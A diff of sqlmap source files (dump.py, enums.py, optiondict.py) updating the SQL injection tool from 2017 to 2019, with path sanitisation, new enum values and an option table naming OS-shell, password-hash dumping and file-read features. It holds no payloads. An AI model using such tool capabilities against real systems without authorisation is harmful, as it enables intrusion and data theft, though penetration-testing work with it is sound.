|
os.makedirs(dumpDbPath)
|
||||||
except:
|
except:
|
||||||
warnFile = True
|
warnFile = True
|
||||||
|
|
||||||
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)))
|
||||||
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
||||||
|
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
try:
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||||
except IOError, _:
|
except IOError as _:
|
||||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
errMsg += "Please make sure that your disk is not full and "
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
errMsg += "that you have sufficient write permissions to "
|
errMsg += "that you have sufficient write permissions to "
|
||||||
@@ -441,7 +443,7 @@ class Dump(object):
|
|||||||
|
|
||||||
dumpDbPath = tempDir
|
dumpDbPath = tempDir
|
||||||
|
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
|
||||||
if not checkFile(dumpFileName, False):
|
if not checkFile(dumpFileName, False):
|
||||||
try:
|
try:
|
||||||
openFile(dumpFileName, "w+b").close()
|
openFile(dumpFileName, "w+b").close()
|
||||||
@@ -450,9 +452,9 @@ class Dump(object):
|
|||||||
except:
|
except:
|
||||||
warnFile = True
|
warnFile = True
|
||||||
|
|
||||||
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||||
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
|
_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)))
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||||
else:
|
else:
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||||
@@ -531,6 +533,7 @@ class Dump(object):
|
|||||||
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
||||||
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
||||||
|
dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
|
||||||
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
||||||
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
||||||
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
|
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
|
||||||
@@ -611,9 +614,9 @@ class Dump(object):
|
|||||||
mimetype = magic.from_buffer(value, mime=True)
|
mimetype = magic.from_buffer(value, mime=True)
|
||||||
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath)
|
||||||
|
|
||||||
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
|
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
|
||||||
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
|
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
|
||||||
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
@@ -621,8 +624,8 @@ class Dump(object):
|
|||||||
with open(filepath, "wb") as f:
|
with open(filepath, "wb") as f:
|
||||||
_ = safechardecode(value, True)
|
_ = safechardecode(value, True)
|
||||||
f.write(_)
|
f.write(_)
|
||||||
except magic.MagicException, err:
|
except magic.MagicException as ex:
|
||||||
logger.debug(str(err))
|
logger.debug(getSafeExString(ex))
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
if field == fields:
|
if field == fields:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -22,6 +22,15 @@ class SORT_ORDER:
|
|||||||
FIFTH = 4
|
FIFTH = 4
|
||||||
LAST = 100
|
LAST = 100
|
||||||
|
|
||||||
|
# Reference: https://docs.python.org/2/library/logging.html#logging-levels
|
||||||
|
class LOGGING_LEVELS:
|
||||||
|
NOTSET = 0
|
||||||
|
DEBUG = 10
|
||||||
|
INFO = 20
|
||||||
|
WARNING = 30
|
||||||
|
ERROR = 40
|
||||||
|
CRITICAL = 50
|
||||||
|
|
||||||
class DBMS:
|
class DBMS:
|
||||||
ACCESS = "Microsoft Access"
|
ACCESS = "Microsoft Access"
|
||||||
DB2 = "IBM DB2"
|
DB2 = "IBM DB2"
|
||||||
@@ -34,6 +43,7 @@ class DBMS:
|
|||||||
SQLITE = "SQLite"
|
SQLITE = "SQLite"
|
||||||
SYBASE = "Sybase"
|
SYBASE = "Sybase"
|
||||||
HSQLDB = "HSQLDB"
|
HSQLDB = "HSQLDB"
|
||||||
|
H2 = "H2"
|
||||||
INFORMIX = "Informix"
|
INFORMIX = "Informix"
|
||||||
|
|
||||||
class DBMS_DIRECTORY_NAME:
|
class DBMS_DIRECTORY_NAME:
|
||||||
@@ -48,6 +58,7 @@ class DBMS_DIRECTORY_NAME:
|
|||||||
SQLITE = "sqlite"
|
SQLITE = "sqlite"
|
||||||
SYBASE = "sybase"
|
SYBASE = "sybase"
|
||||||
HSQLDB = "hsqldb"
|
HSQLDB = "hsqldb"
|
||||||
|
H2 = "h2"
|
||||||
INFORMIX = "informix"
|
INFORMIX = "informix"
|
||||||
|
|
||||||
class CUSTOM_LOGGING:
|
class CUSTOM_LOGGING:
|
||||||
@@ -233,40 +244,42 @@ class REDIRECTION:
|
|||||||
|
|
||||||
class PAYLOAD:
|
class PAYLOAD:
|
||||||
SQLINJECTION = {
|
SQLINJECTION = {
|
||||||
1: "boolean-based blind",
|
1: "boolean-based blind",
|
||||||
2: "error-based",
|
2: "error-based",
|
||||||
3: "inline query",
|
3: "inline query",
|
||||||
4: "stacked queries",
|
4: "stacked queries",
|
||||||
5: "AND/OR time-based blind",
|
5: "AND/OR time-based blind",
|
||||||
6: "UNION query",
|
6: "UNION query",
|
||||||
}
|
}
|
||||||
|
|
||||||
PARAMETER = {
|
PARAMETER = {
|
||||||
1: "Unescaped numeric",
|
1: "Unescaped numeric",
|
||||||
2: "Single quoted string",
|
2: "Single quoted string",
|
||||||
3: "LIKE single quoted string",
|
3: "LIKE single quoted string",
|
||||||
4: "Double quoted string",
|
4: "Double quoted string",
|
||||||
5: "LIKE double quoted string",
|
5: "LIKE double quoted string",
|
||||||
}
|
6: "Identifier (e.g. column name)",
|
||||||
|
}
|
||||||
|
|
||||||
RISK = {
|
RISK = {
|
||||||
0: "No risk",
|
0: "No risk",
|
||||||
1: "Low risk",
|
1: "Low risk",
|
||||||
2: "Medium risk",
|
2: "Medium risk",
|
||||||
3: "High risk",
|
3: "High risk",
|
||||||
}
|
}
|
||||||
|
|
||||||
CLAUSE = {
|
CLAUSE = {
|
||||||
0: "Always",
|
0: "Always",
|
||||||
1: "WHERE",
|
1: "WHERE",
|
||||||
2: "GROUP BY",
|
2: "GROUP BY",
|
||||||
3: "ORDER BY",
|
3: "ORDER BY",
|
||||||
4: "LIMIT",
|
4: "LIMIT",
|
||||||
5: "OFFSET",
|
5: "OFFSET",
|
||||||
6: "TOP",
|
6: "TOP",
|
||||||
7: "Table name",
|
7: "Table name",
|
||||||
8: "Column name",
|
8: "Column name",
|
||||||
}
|
9: "Pre-WHERE (non-query)",
|
||||||
|
}
|
||||||
|
|
||||||
class METHOD:
|
class METHOD:
|
||||||
COMPARISON = "comparison"
|
COMPARISON = "comparison"
|
||||||
@@ -297,7 +310,7 @@ class ADJUST_TIME_DELAY:
|
|||||||
NO = 0
|
NO = 0
|
||||||
YES = 1
|
YES = 1
|
||||||
|
|
||||||
class WEB_API:
|
class WEB_PLATFORM:
|
||||||
PHP = "php"
|
PHP = "php"
|
||||||
ASP = "asp"
|
ASP = "asp"
|
||||||
ASPX = "aspx"
|
ASPX = "aspx"
|
||||||
@@ -331,34 +344,6 @@ class CONTENT_TYPE:
|
|||||||
OS_CMD = 24
|
OS_CMD = 24
|
||||||
REG_READ = 25
|
REG_READ = 25
|
||||||
|
|
||||||
PART_RUN_CONTENT_TYPES = {
|
|
||||||
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
|
||||||
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
|
||||||
"getBanner": CONTENT_TYPE.BANNER,
|
|
||||||
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
|
||||||
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
|
||||||
"getHostname": CONTENT_TYPE.HOSTNAME,
|
|
||||||
"isDba": CONTENT_TYPE.IS_DBA,
|
|
||||||
"getUsers": CONTENT_TYPE.USERS,
|
|
||||||
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
|
||||||
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
|
||||||
"getRoles": CONTENT_TYPE.ROLES,
|
|
||||||
"getDbs": CONTENT_TYPE.DBS,
|
|
||||||
"getTables": CONTENT_TYPE.TABLES,
|
|
||||||
"getColumns": CONTENT_TYPE.COLUMNS,
|
|
||||||
"getSchema": CONTENT_TYPE.SCHEMA,
|
|
||||||
"getCount": CONTENT_TYPE.COUNT,
|
|
||||||
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
|
||||||
"search": CONTENT_TYPE.SEARCH,
|
|
||||||
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
|
||||||
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
|
||||||
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
|
||||||
"readFile": CONTENT_TYPE.FILE_READ,
|
|
||||||
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
|
||||||
"osCmd": CONTENT_TYPE.OS_CMD,
|
|
||||||
"regRead": CONTENT_TYPE.REG_READ
|
|
||||||
}
|
|
||||||
|
|
||||||
class CONTENT_STATUS:
|
class CONTENT_STATUS:
|
||||||
IN_PROGRESS = 0
|
IN_PROGRESS = 0
|
||||||
COMPLETE = 1
|
COMPLETE = 1
|
||||||
@@ -373,6 +358,7 @@ class AUTOCOMPLETE_TYPE:
|
|||||||
SQL = 0
|
SQL = 0
|
||||||
OS = 1
|
OS = 1
|
||||||
SQLMAP = 2
|
SQLMAP = 2
|
||||||
|
API = 3
|
||||||
|
|
||||||
class NOTE:
|
class NOTE:
|
||||||
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
||||||
@@ -392,3 +378,7 @@ class TIMEOUT_STATE:
|
|||||||
NORMAL = 0
|
NORMAL = 0
|
||||||
EXCEPTION = 1
|
EXCEPTION = 1
|
||||||
TIMEOUT = 2
|
TIMEOUT = 2
|
||||||
|
|
||||||
|
class HINT:
|
||||||
|
PREPEND = 0
|
||||||
|
APPEND = 1
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,255 +1,259 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
optDict = {
|
optDict = {
|
||||||
# Format:
|
# Family: {"parameter name": "parameter datatype"},
|
||||||
# Family: { "parameter name": "parameter datatype" },
|
# --OR--
|
||||||
# Or:
|
# Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
|
||||||
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
|
|
||||||
"Target": {
|
|
||||||
"direct": "string",
|
|
||||||
"url": "string",
|
|
||||||
"logFile": "string",
|
|
||||||
"bulkFile": "string",
|
|
||||||
"requestFile": "string",
|
|
||||||
"sessionFile": "string",
|
|
||||||
"googleDork": "string",
|
|
||||||
"configFile": "string",
|
|
||||||
"sitemapUrl": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Request": {
|
"Target": {
|
||||||
"method": "string",
|
"direct": "string",
|
||||||
"data": "string",
|
"url": "string",
|
||||||
"paramDel": "string",
|
"logFile": "string",
|
||||||
"cookie": "string",
|
"bulkFile": "string",
|
||||||
"cookieDel": "string",
|
"requestFile": "string",
|
||||||
"loadCookies": "string",
|
"sessionFile": "string",
|
||||||
"dropSetCookie": "boolean",
|
"googleDork": "string",
|
||||||
"agent": "string",
|
"configFile": "string",
|
||||||
"randomAgent": "boolean",
|
"sitemapUrl": "string",
|
||||||
"host": "string",
|
},
|
||||||
"referer": "string",
|
|
||||||
"headers": "string",
|
|
||||||
"authType": "string",
|
|
||||||
"authCred": "string",
|
|
||||||
"authFile": "string",
|
|
||||||
"ignoreCode": "integer",
|
|
||||||
"ignoreProxy": "boolean",
|
|
||||||
"ignoreRedirects": "boolean",
|
|
||||||
"ignoreTimeouts": "boolean",
|
|
||||||
"proxy": "string",
|
|
||||||
"proxyCred": "string",
|
|
||||||
"proxyFile": "string",
|
|
||||||
"tor": "boolean",
|
|
||||||
"torPort": "integer",
|
|
||||||
"torType": "string",
|
|
||||||
"checkTor": "boolean",
|
|
||||||
"delay": "float",
|
|
||||||
"timeout": "float",
|
|
||||||
"retries": "integer",
|
|
||||||
"rParam": "string",
|
|
||||||
"safeUrl": "string",
|
|
||||||
"safePost": "string",
|
|
||||||
"safeReqFile": "string",
|
|
||||||
"safeFreq": "integer",
|
|
||||||
"skipUrlEncode": "boolean",
|
|
||||||
"csrfToken": "string",
|
|
||||||
"csrfUrl": "string",
|
|
||||||
"forceSSL": "boolean",
|
|
||||||
"hpp": "boolean",
|
|
||||||
"evalCode": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Optimization": {
|
"Request": {
|
||||||
"optimize": "boolean",
|
"method": "string",
|
||||||
"predictOutput": "boolean",
|
"data": "string",
|
||||||
"keepAlive": "boolean",
|
"paramDel": "string",
|
||||||
"nullConnection": "boolean",
|
"cookie": "string",
|
||||||
"threads": "integer",
|
"cookieDel": "string",
|
||||||
},
|
"loadCookies": "string",
|
||||||
|
"dropSetCookie": "boolean",
|
||||||
|
"agent": "string",
|
||||||
|
"randomAgent": "boolean",
|
||||||
|
"host": "string",
|
||||||
|
"referer": "string",
|
||||||
|
"headers": "string",
|
||||||
|
"authType": "string",
|
||||||
|
"authCred": "string",
|
||||||
|
"authFile": "string",
|
||||||
|
"ignoreCode": "integer",
|
||||||
|
"ignoreProxy": "boolean",
|
||||||
|
"ignoreRedirects": "boolean",
|
||||||
|
"ignoreTimeouts": "boolean",
|
||||||
|
"proxy": "string",
|
||||||
|
"proxyCred": "string",
|
||||||
|
"proxyFile": "string",
|
||||||
|
"tor": "boolean",
|
||||||
|
"torPort": "integer",
|
||||||
|
"torType": "string",
|
||||||
|
"checkTor": "boolean",
|
||||||
|
"delay": "float",
|
||||||
|
"timeout": "float",
|
||||||
|
"retries": "integer",
|
||||||
|
"rParam": "string",
|
||||||
|
"safeUrl": "string",
|
||||||
|
"safePost": "string",
|
||||||
|
"safeReqFile": "string",
|
||||||
|
"safeFreq": "integer",
|
||||||
|
"skipUrlEncode": "boolean",
|
||||||
|
"csrfToken": "string",
|
||||||
|
"csrfUrl": "string",
|
||||||
|
"forceSSL": "boolean",
|
||||||
|
"hpp": "boolean",
|
||||||
|
"evalCode": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Injection": {
|
"Optimization": {
|
||||||
"testParameter": "string",
|
"optimize": "boolean",
|
||||||
"skip": "string",
|
"predictOutput": "boolean",
|
||||||
"skipStatic": "boolean",
|
"keepAlive": "boolean",
|
||||||
"paramExclude": "string",
|
"nullConnection": "boolean",
|
||||||
"dbms": "string",
|
"threads": "integer",
|
||||||
"dbmsCred": "string",
|
},
|
||||||
"os": "string",
|
|
||||||
"invalidBignum": "boolean",
|
|
||||||
"invalidLogical": "boolean",
|
|
||||||
"invalidString": "boolean",
|
|
||||||
"noCast": "boolean",
|
|
||||||
"noEscape": "boolean",
|
|
||||||
"prefix": "string",
|
|
||||||
"suffix": "string",
|
|
||||||
"tamper": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Detection": {
|
"Injection": {
|
||||||
"level": "integer",
|
"testParameter": "string",
|
||||||
"risk": "integer",
|
"skip": "string",
|
||||||
"string": "string",
|
"skipStatic": "boolean",
|
||||||
"notString": "string",
|
"paramExclude": "string",
|
||||||
"regexp": "string",
|
"dbms": "string",
|
||||||
"code": "integer",
|
"dbmsCred": "string",
|
||||||
"textOnly": "boolean",
|
"os": "string",
|
||||||
"titles": "boolean",
|
"invalidBignum": "boolean",
|
||||||
},
|
"invalidLogical": "boolean",
|
||||||
|
"invalidString": "boolean",
|
||||||
|
"noCast": "boolean",
|
||||||
|
"noEscape": "boolean",
|
||||||
|
"prefix": "string",
|
||||||
|
"suffix": "string",
|
||||||
|
"tamper": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Techniques": {
|
"Detection": {
|
||||||
"tech": "string",
|
"level": "integer",
|
||||||
"timeSec": "integer",
|
"risk": "integer",
|
||||||
"uCols": "string",
|
"string": "string",
|
||||||
"uChar": "string",
|
"notString": "string",
|
||||||
"uFrom": "string",
|
"regexp": "string",
|
||||||
"dnsDomain": "string",
|
"code": "integer",
|
||||||
"secondOrder": "string",
|
"textOnly": "boolean",
|
||||||
},
|
"titles": "boolean",
|
||||||
|
},
|
||||||
|
|
||||||
"Fingerprint": {
|
"Techniques": {
|
||||||
"extensiveFp": "boolean",
|
"tech": "string",
|
||||||
},
|
"timeSec": "integer",
|
||||||
|
"uCols": "string",
|
||||||
|
"uChar": "string",
|
||||||
|
"uFrom": "string",
|
||||||
|
"dnsDomain": "string",
|
||||||
|
"secondUrl": "string",
|
||||||
|
"secondReq": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Enumeration": {
|
"Fingerprint": {
|
||||||
"getAll": "boolean",
|
"extensiveFp": "boolean",
|
||||||
"getBanner": ("boolean", "Banners"),
|
},
|
||||||
"getCurrentUser": ("boolean", "Users"),
|
|
||||||
"getCurrentDb": ("boolean", "Databases"),
|
|
||||||
"getHostname": "boolean",
|
|
||||||
"isDba": "boolean",
|
|
||||||
"getUsers": ("boolean", "Users"),
|
|
||||||
"getPasswordHashes": ("boolean", "Passwords"),
|
|
||||||
"getPrivileges": ("boolean", "Privileges"),
|
|
||||||
"getRoles": ("boolean", "Roles"),
|
|
||||||
"getDbs": ("boolean", "Databases"),
|
|
||||||
"getTables": ("boolean", "Tables"),
|
|
||||||
"getColumns": ("boolean", "Columns"),
|
|
||||||
"getSchema": "boolean",
|
|
||||||
"getCount": "boolean",
|
|
||||||
"dumpTable": "boolean",
|
|
||||||
"dumpAll": "boolean",
|
|
||||||
"search": "boolean",
|
|
||||||
"getComments": "boolean",
|
|
||||||
"db": "string",
|
|
||||||
"tbl": "string",
|
|
||||||
"col": "string",
|
|
||||||
"excludeCol": "string",
|
|
||||||
"pivotColumn": "string",
|
|
||||||
"dumpWhere": "string",
|
|
||||||
"user": "string",
|
|
||||||
"excludeSysDbs": "boolean",
|
|
||||||
"limitStart": "integer",
|
|
||||||
"limitStop": "integer",
|
|
||||||
"firstChar": "integer",
|
|
||||||
"lastChar": "integer",
|
|
||||||
"query": "string",
|
|
||||||
"sqlShell": "boolean",
|
|
||||||
"sqlFile": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Brute": {
|
"Enumeration": {
|
||||||
"commonTables": "boolean",
|
"getAll": "boolean",
|
||||||
"commonColumns": "boolean",
|
"getBanner": ("boolean", "Banners"),
|
||||||
},
|
"getCurrentUser": ("boolean", "Users"),
|
||||||
|
"getCurrentDb": ("boolean", "Databases"),
|
||||||
|
"getHostname": "boolean",
|
||||||
|
"isDba": "boolean",
|
||||||
|
"getUsers": ("boolean", "Users"),
|
||||||
|
"getPasswordHashes": ("boolean", "Passwords"),
|
||||||
|
"getPrivileges": ("boolean", "Privileges"),
|
||||||
|
"getRoles": ("boolean", "Roles"),
|
||||||
|
"getDbs": ("boolean", "Databases"),
|
||||||
|
"getTables": ("boolean", "Tables"),
|
||||||
|
"getColumns": ("boolean", "Columns"),
|
||||||
|
"getSchema": "boolean",
|
||||||
|
"getCount": "boolean",
|
||||||
|
"dumpTable": "boolean",
|
||||||
|
"dumpAll": "boolean",
|
||||||
|
"search": "boolean",
|
||||||
|
"getComments": "boolean",
|
||||||
|
"db": "string",
|
||||||
|
"tbl": "string",
|
||||||
|
"col": "string",
|
||||||
|
"exclude": "string",
|
||||||
|
"pivotColumn": "string",
|
||||||
|
"dumpWhere": "string",
|
||||||
|
"user": "string",
|
||||||
|
"excludeSysDbs": "boolean",
|
||||||
|
"limitStart": "integer",
|
||||||
|
"limitStop": "integer",
|
||||||
|
"firstChar": "integer",
|
||||||
|
"lastChar": "integer",
|
||||||
|
"query": "string",
|
||||||
|
"sqlShell": "boolean",
|
||||||
|
"sqlFile": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"User-defined function": {
|
"Brute": {
|
||||||
"udfInject": "boolean",
|
"commonTables": "boolean",
|
||||||
"shLib": "string",
|
"commonColumns": "boolean",
|
||||||
},
|
},
|
||||||
|
|
||||||
"File system": {
|
"User-defined function": {
|
||||||
"rFile": "string",
|
"udfInject": "boolean",
|
||||||
"wFile": "string",
|
"shLib": "string",
|
||||||
"dFile": "string",
|
},
|
||||||
},
|
|
||||||
|
|
||||||
"Takeover": {
|
"File system": {
|
||||||
"osCmd": "string",
|
"fileRead": "string",
|
||||||
"osShell": "boolean",
|
"fileWrite": "string",
|
||||||
"osPwn": "boolean",
|
"fileDest": "string",
|
||||||
"osSmb": "boolean",
|
},
|
||||||
"osBof": "boolean",
|
|
||||||
"privEsc": "boolean",
|
|
||||||
"msfPath": "string",
|
|
||||||
"tmpPath": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Windows": {
|
"Takeover": {
|
||||||
"regRead": "boolean",
|
"osCmd": "string",
|
||||||
"regAdd": "boolean",
|
"osShell": "boolean",
|
||||||
"regDel": "boolean",
|
"osPwn": "boolean",
|
||||||
"regKey": "string",
|
"osSmb": "boolean",
|
||||||
"regVal": "string",
|
"osBof": "boolean",
|
||||||
"regData": "string",
|
"privEsc": "boolean",
|
||||||
"regType": "string",
|
"msfPath": "string",
|
||||||
},
|
"tmpPath": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"General": {
|
"Windows": {
|
||||||
#"xmlFile": "string",
|
"regRead": "boolean",
|
||||||
"trafficFile": "string",
|
"regAdd": "boolean",
|
||||||
"batch": "boolean",
|
"regDel": "boolean",
|
||||||
"binaryFields": "string",
|
"regKey": "string",
|
||||||
"charset": "string",
|
"regVal": "string",
|
||||||
"checkInternet": "boolean",
|
"regData": "string",
|
||||||
"crawlDepth": "integer",
|
"regType": "string",
|
||||||
"crawlExclude": "string",
|
},
|
||||||
"csvDel": "string",
|
|
||||||
"dumpFormat": "string",
|
|
||||||
"encoding": "string",
|
|
||||||
"eta": "boolean",
|
|
||||||
"flushSession": "boolean",
|
|
||||||
"forms": "boolean",
|
|
||||||
"freshQueries": "boolean",
|
|
||||||
"harFile": "string",
|
|
||||||
"hexConvert": "boolean",
|
|
||||||
"outputDir": "string",
|
|
||||||
"parseErrors": "boolean",
|
|
||||||
"saveConfig": "string",
|
|
||||||
"scope": "string",
|
|
||||||
"testFilter": "string",
|
|
||||||
"testSkip": "string",
|
|
||||||
"updateAll": "boolean",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Miscellaneous": {
|
"General": {
|
||||||
"alert": "string",
|
# "xmlFile": "string",
|
||||||
"answers": "string",
|
"trafficFile": "string",
|
||||||
"beep": "boolean",
|
"batch": "boolean",
|
||||||
"cleanup": "boolean",
|
"binaryFields": "string",
|
||||||
"dependencies": "boolean",
|
"charset": "string",
|
||||||
"disableColoring": "boolean",
|
"checkInternet": "boolean",
|
||||||
"googlePage": "integer",
|
"crawlDepth": "integer",
|
||||||
"identifyWaf": "boolean",
|
"crawlExclude": "string",
|
||||||
"mobile": "boolean",
|
"csvDel": "string",
|
||||||
"offline": "boolean",
|
"dumpFormat": "string",
|
||||||
"purgeOutput": "boolean",
|
"encoding": "string",
|
||||||
"skipWaf": "boolean",
|
"eta": "boolean",
|
||||||
"smart": "boolean",
|
"flushSession": "boolean",
|
||||||
"tmpDir": "string",
|
"forms": "boolean",
|
||||||
"webRoot": "string",
|
"freshQueries": "boolean",
|
||||||
"wizard": "boolean",
|
"harFile": "string",
|
||||||
"verbose": "integer",
|
"hexConvert": "boolean",
|
||||||
},
|
"outputDir": "string",
|
||||||
"Hidden": {
|
"parseErrors": "boolean",
|
||||||
"dummy": "boolean",
|
"saveConfig": "string",
|
||||||
"disablePrecon": "boolean",
|
"scope": "string",
|
||||||
"profile": "boolean",
|
"testFilter": "string",
|
||||||
"forceDns": "boolean",
|
"testSkip": "string",
|
||||||
"murphyRate": "integer",
|
"updateAll": "boolean",
|
||||||
"smokeTest": "boolean",
|
},
|
||||||
"liveTest": "boolean",
|
|
||||||
"stopFail": "boolean",
|
"Miscellaneous": {
|
||||||
"runCase": "string",
|
"alert": "string",
|
||||||
},
|
"answers": "string",
|
||||||
"API": {
|
"beep": "boolean",
|
||||||
"api": "boolean",
|
"cleanup": "boolean",
|
||||||
"taskid": "string",
|
"dependencies": "boolean",
|
||||||
"database": "string",
|
"disableColoring": "boolean",
|
||||||
}
|
